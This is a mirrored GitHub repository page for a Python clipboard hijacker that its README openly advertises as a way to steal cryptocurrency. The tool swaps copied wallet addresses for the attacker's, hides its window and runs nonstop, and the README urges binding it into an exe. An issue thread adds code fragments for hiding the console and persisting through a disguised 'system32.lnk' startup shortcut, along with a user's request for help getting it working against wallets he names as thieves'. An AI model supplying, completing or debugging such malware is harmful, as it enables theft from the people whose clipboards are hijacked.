Coder Social home page Coder Social logo

elmantr / cryptocurrencies-hack-with-clipboard-in-python Goto Github PK

View Code? Open in Web Editor NEW
56.0 8.0 37.0 6 KB

This source code replaces the given wallet address with the original wallet address when the target wants to transfer cryptocurrencies! and the cryptocurrencies are sent to you!

Python 100.00%
bitcoin cryptocurrencies cryptocurrency ethereum

cryptocurrencies-hack-with-clipboard-in-python's Introduction

Cryptocurrencies-hack-with-clipboard-in-python

A great code to hack cryptocurrencies with clipboard!

  • This source code replaces the given wallet address with original wallet address when the target wants to transfer cryptocurrencies, and the cryptocurrencies are sent to you!
  • No terminal page visible !
  • Non stop!

Download the project. Then go to the project directory in the terminal and type:

1.pip install virtualenv

2.virtualenv env

3."env/Scripts/activate.bat"

4.pip install -r requirements.txt

Next open the source code and fill out config() function fields in source code !

Attention! This code works perfectly if it is converted to exe and binded!

Done ! Enjoy :)!

cryptocurrencies-hack-with-clipboard-in-python's People

Contributors

elmantr avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

cryptocurrencies-hack-with-clipboard-in-python's Issues

Getting an error...

@ElmanTr - Nice work and everything seemed to be running, then I went in and completed config() as follows:

if name == 'C://local//Bitcoin-hack-with-clipboard-in-python//':
    alternative = "C://local//Bitcoin-hack-with-clipboard-in-python//"
    return alternative

if name == 'btc wallet 1':
    alternative = "MyBTCWallet1"
    return alternative

if name == 'btc wallet 2':
    alternative = "MyBTCWallet2"
    return alternative

if name == 'btc wallet 3':
    alternative = "MyBTCWallet3"
    return alternative

Also did a find/replace-all for {btc wallet1,...,bcwallet3} which made 3 replacements, the ones above and two other locations.

I popped in the paths and replaced \User\{}\... with {} = myusername as follows:

lnk_r = subprocess.run('dir',cwd='C:\Users\{ME}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'.format(info_o2),shell=True,stdout=subprocess.PIPE)
lnk_output = lnk_r.stdout.decode("utf-8")
f3 = lnk_output.find('system32.lnk')
if f3 == -1 :
path = os.path.join("C:\Users\(ME}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup".format(info_o2), "system32.lnk")
target = "{}\BTC-hack-with-clipboard.exe".format(config('C:\ocal\Bitcoin-hack-with-clipboard-in-python\'))
wDir = config('C:\local\Bitcoin-hack-with-clipboard-in-python\')

I also executed the following because it kept throwing an error:

[prompt]> BTC-env3.exe (the .exe I created from the .py script using auto-py-to-exe

env [prompt] > BTC-env3.exe (Note: I renamed he filename to be a bit less blinging...lmao)

Traceback (most recent call last):
File "BTC-env3.py", line 1, in
import win32clipboard
ModuleNotFoundError: No module named 'win32clipboard'
[19636] Failed to execute script BTC-env3

So, executed the following:

env [prompt]> python C:\local\Bitcoin-hack-with-clipboard-in-python\env\Scripts\pywin32_postinstall.py -install

And the following is the output, [it succeeded]:

Parsed arguments are: Namespace(destination='C:\local\Bitcoin-hack-with-clipboard-in-python\env\Lib\site-packages', install=True, quiet=False, remove=False, silent=False, wait=None)
Copied pythoncom38.dll to C:\Windows\system32\pythoncom38.dll
Copied pywintypes38.dll to C:\Windows\system32\pywintypes38.dll
Registered: Python.Interpreter
Registered: Python.Dictionary
Registered: Python
-> Software\Python\PythonCore\3.8\Help[None]=None
-> Software\Python\PythonCore\3.8\Help\Pythonwin Reference[None]='C:\local\Bitcoin-hack-with-clipboard-in-python\env\Lib\site-packages\PyWin32.chm'
Pythonwin has been registered in context menu
Creating directory C:\local\Bitcoin-hack-with-clipboard-in-python\env\Lib\site-packages\win32com\gen_py
Shortcut for Pythonwin created
Shortcut to documentation created
The pywin32 extensions were successfully installed.

However, when executing the .py script, the window disappears [as it should from your script]:

Hide terminal

kernel = ctypes.WinDLL('kernel32')
user = ctypes.WinDLL('user32')
SW_HIDE = 0
hWnd = kernel.GetConsoleWindow()
user.ShowWindow(hWnd, SW_HIDE)

However, the .exe file is still throwing the error:
Traceback (most recent call last):
File "BTC-env3.py", line 1, in
import win32clipboard
ModuleNotFoundError: No module named 'win32clipboard'
[19636] Failed to execute script BTC-env3

And, not seeing it in the ask manager as running...(???) - So, no way of telling if its running the background or not.

Thanks for posting, I can actually hopefully get 120 BTC that were stolen from me and I know the people who did it, and I know their addresses {a least the ones they were using when it was taken, and saw they have not spent it yet on the blockchain, so would be nice to get my BTC back...so it is being used legitimately since local law enforcement cannot get off their asses to do anything!

Last, I went ahead and commented out the hide terminal part and when running the script, seeing the following error:

Traceback (most recent call last):
File "BTC-env3.py", line 59, in
shortcut.WorkingDirectory = wDir
File "C:\local\Bitcoin-hack-with-clipboard-in-python\env\lib\site-packages\win32com\client\dynamic.py", line 565, in setattr
raise AttributeError("Property '%s.%s' can not be set." % (self.username, attr))
AttributeError: Property '.WorkingDirectory' can not be set.

??? - I have taken ownership of that working directory and signed in with local user account and a member of administrators, so that is not the reason for this error '.WorkingDirectory' can not be set - any ideas too help me get this up and running would be greatly appreciated so I can hopefully recover if not all a part of whomever it was - a least I have their wallets, so I am creating env1, env2, and env3, to have 9 wallets in total, each envN.py will run within its own envN virtual environment.

And, I have some ideas for you as I have Mathematica 12 which has a new section called Blockchain, and that could be used to yours, mine, and others' advantage, so feel free to email me directly [email protected].

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.